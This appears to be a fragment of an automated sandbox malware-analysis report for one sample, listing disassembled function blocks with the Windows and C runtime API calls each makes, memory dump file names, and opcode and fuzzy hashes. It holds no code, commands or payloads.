                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C51E9F1E20306BAD765AF70EE42BB773A8EF04700F14447AFB4997181E770D9608AA1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32(BB40E64E,ios_base::badbit set,?,?,?,00000000,0024AD5D,000000FF,00000000,00229652), ref: 0022CBF2
                                                                                                                                                                                                                                                • Part of subcall function 0022CC88: std::_Throw_Cpp_error.LIBCPMT ref: 0022CCA9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                                                                                                                                                                                              • String ID: @z%$Xi%$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 350343453-44902782
                                                                                                                                                                                                                                              • Opcode ID: 83409da9f9b6e983440c55e9a43b4312c14af398bd28e36e0578eac413b81735
                                                                                                                                                                                                                                              • Instruction ID: ecb748b31f06270821a8d3117794eb834ae714f88d1cc8e20eb2515b2f584d25
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83409da9f9b6e983440c55e9a43b4312c14af398bd28e36e0578eac413b81735
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16110B31620762AFDB15DF94E841BAEB3A4FF04361F50053EE41EA7680D771AC20CB50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002455BD,00000000,?,00258370,?,?,?,002454F4,00000004,InitializeCriticalSectionEx,0024E634,0024E63C), ref: 0024552E
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,002455BD,00000000,?,00258370,?,?,?,002454F4,00000004,InitializeCriticalSectionEx,0024E634,0024E63C,00000000,?,0023A57C), ref: 00245538
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00245560
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                              • Opcode ID: 23f128627182a6bc39588da36d4edd1a388f49472ef4c2200735cf3286da24b0
                                                                                                                                                                                                                                              • Instruction ID: 1ceacc808259dd4d2f6bb0088e777e31f7303aeba4d5e8a1e573c2bd7968123a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f128627182a6bc39588da36d4edd1a388f49472ef4c2200735cf3286da24b0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE04830694305B7DF155F50FC0AB683BA59B10F92F641020F94CE44E1D7719A709648
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 0024292D
                                                                                                                                                                                                                                                • Part of subcall function 0023A9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0023C231,?,00000000,-00000008), ref: 0023AA42
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00242B7F
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00242BC5
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00242C68
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                                              • Opcode ID: a7a23412ab50f2d700c56611ecd157cfcb478cc31917d6965829228d6af989cd
                                                                                                                                                                                                                                              • Instruction ID: 49712424502d63908cc3902fb40641404d7835b8d381ccd9bee0c7862dd6657f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7a23412ab50f2d700c56611ecd157cfcb478cc31917d6965829228d6af989cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61D198B1D10249DFCB19CFE9D880AADBBB4FF08304F68412AE816EB351E630A955CF50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                              • Opcode ID: c93d860b3f1caf30077e4544ffe178419e65f555ddeca4abe6ee89e67836774a
                                                                                                                                                                                                                                              • Instruction ID: 347c6e459829ee099877541254117ab7123b20a58c54f193d01ac3dad9488df8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c93d860b3f1caf30077e4544ffe178419e65f555ddeca4abe6ee89e67836774a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451E7B252460BAFDB25AF50D442B7AB7A4FF46710F14452EEC0647291D7B1ECE0CB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022286C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022288A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002228AC
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022291A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: 1de7a3d18e0b03daae95be4f0040df587997b43603bce0b6b15654bb5f6a52e3
                                                                                                                                                                                                                                              • Instruction ID: 692ef6bc6888484b2a27d8791d5de267ee6e3b8ebff977f5e2b0d6c0c727a515
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1de7a3d18e0b03daae95be4f0040df587997b43603bce0b6b15654bb5f6a52e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01219C71924320FFC720EFA5F84DA2A77A0FB58325F05445DE8884B261D732AD64CF92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 002282AC
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 002282CA
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002282EC
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022835A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: 1e4ae5b3de698b1b7a95456f6cdeba3160e39407fda057ca0efa959a04050a99
                                                                                                                                                                                                                                              • Instruction ID: 3d510944d051fdee2b88142d5b53fdbae4ab9986574ea5ed45111a92e0734ce1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e4ae5b3de698b1b7a95456f6cdeba3160e39407fda057ca0efa959a04050a99
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C821BF71915321AFC710EF98F849A2A73E0FF58725F45459DE8884B262EB30EC60CF86
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00226B0C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00226B2A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00226B4C
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00226BBA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: 735c752fa5975258ae8e73065f7d97863fb2c57fc5f6e3fbde734ab286b5c97d
                                                                                                                                                                                                                                              • Instruction ID: f776ba968ffd4f7dee796b30c3156baed4b09a7b9f290fed5f79643745d59104
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 735c752fa5975258ae8e73065f7d97863fb2c57fc5f6e3fbde734ab286b5c97d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E21A672914325AFC710EF94F84DA2AB7E0EF58729F05445DE8849B351D730AC60CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022839C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 002283BA
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002283DC
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022844A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: ff4fde3b78f09f1867069b5858b316e1b3f8bd0957a28adfed4687f28d87c36a
                                                                                                                                                                                                                                              • Instruction ID: 24a12ad472b986088e45a2e57840117e2d7011a07de95976792c1d4dc4bf3b22
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff4fde3b78f09f1867069b5858b316e1b3f8bd0957a28adfed4687f28d87c36a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA219471915325AFC710FF95F889A2AB3A0EF58725F05445DE8445B362DB30EC60CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022547C
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022549A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002254BC
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022552A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: ace93e850949ded68e6eaffe55cd7ec6b4bff54700c0c5695fd098cfd00f9b7d
                                                                                                                                                                                                                                              • Instruction ID: 7778c6b44372914fe2606d0bce66292efc9175391aa13ec27ac44f5ac819a325
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ace93e850949ded68e6eaffe55cd7ec6b4bff54700c0c5695fd098cfd00f9b7d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8921B471914730AFC710EF98F949A1AB3E0EF48325F45845DE4494B361DB30AD60CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023A9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0023C231,?,00000000,-00000008), ref: 0023AA42
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0024075A
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00240761
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0024079B
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 002407A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                                                                                              • Opcode ID: 8ea21cc1067cd021427e7a4d01399470ae18679ba3ad87888226e624b7e81952
                                                                                                                                                                                                                                              • Instruction ID: bceea2b83b997b7ea5a9749e4e910759b1070b35eb8c1f1b3a2de761d491e223
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ea21cc1067cd021427e7a4d01399470ae18679ba3ad87888226e624b7e81952
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7321A171624206AF9B14AF61D8C496BF7A9EF10368B508518FE1597251D770FCA0CFA1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d1ba7184e3df41e46c81a7afdf5611aa600fa6562bf137392e32901e36747517
                                                                                                                                                                                                                                              • Instruction ID: 1ac56fedd84d32df12bd9151c288462f69a777cf28fc4f7e2607a6d48a20b448
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1ba7184e3df41e46c81a7afdf5611aa600fa6562bf137392e32901e36747517
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5021BEF122420AAFCB10AFA4DCE596BB7ADEF04368F108915F81597151EB30EC618BB0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00241AF4
                                                                                                                                                                                                                                                • Part of subcall function 0023A9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0023C231,?,00000000,-00000008), ref: 0023AA42
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00241B2C
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00241B4C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                                                                                              • Opcode ID: a732f5d7421a66f9e6c9b4afb42b88458e9618ac554a923ca0d1af2121368f7c
                                                                                                                                                                                                                                              • Instruction ID: 65efe5835619236b0ffa65926228dd2a055bd6d94e61df83b9585612fd117e87
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a732f5d7421a66f9e6c9b4afb42b88458e9618ac554a923ca0d1af2121368f7c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5511C4E1A316157E67162B716C8EC7F79ACDEA57E9B100438F40191101FE708E718A71
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0022CB31
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022CB3B
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0022CB52
                                                                                                                                                                                                                                                • Part of subcall function 0022A613: std::_Lockit::_Lockit.LIBCPMT ref: 0022A624
                                                                                                                                                                                                                                                • Part of subcall function 0022A613: std::_Lockit::~_Lockit.LIBCPMT ref: 0022A63E
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022CBAC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1383202999-0
                                                                                                                                                                                                                                              • Opcode ID: 31e70956de11d88cb2ee004fa510f7577b248aafa27e6d1ba063aa0ca3be17c1
                                                                                                                                                                                                                                              • Instruction ID: db33604ada947b5e92e7716320e5123fb7a2e5ad26bdcfa3e07cc34ead4eb46c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31e70956de11d88cb2ee004fa510f7577b248aafa27e6d1ba063aa0ca3be17c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD11AC3182422AABCB05EFE4F95A6BDB764AB48724F244449E8016B281CF709A208F91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00248EBF,00000000,00000001,00000000,?,?,00242CBC,?,00000000,00000000), ref: 002499E7
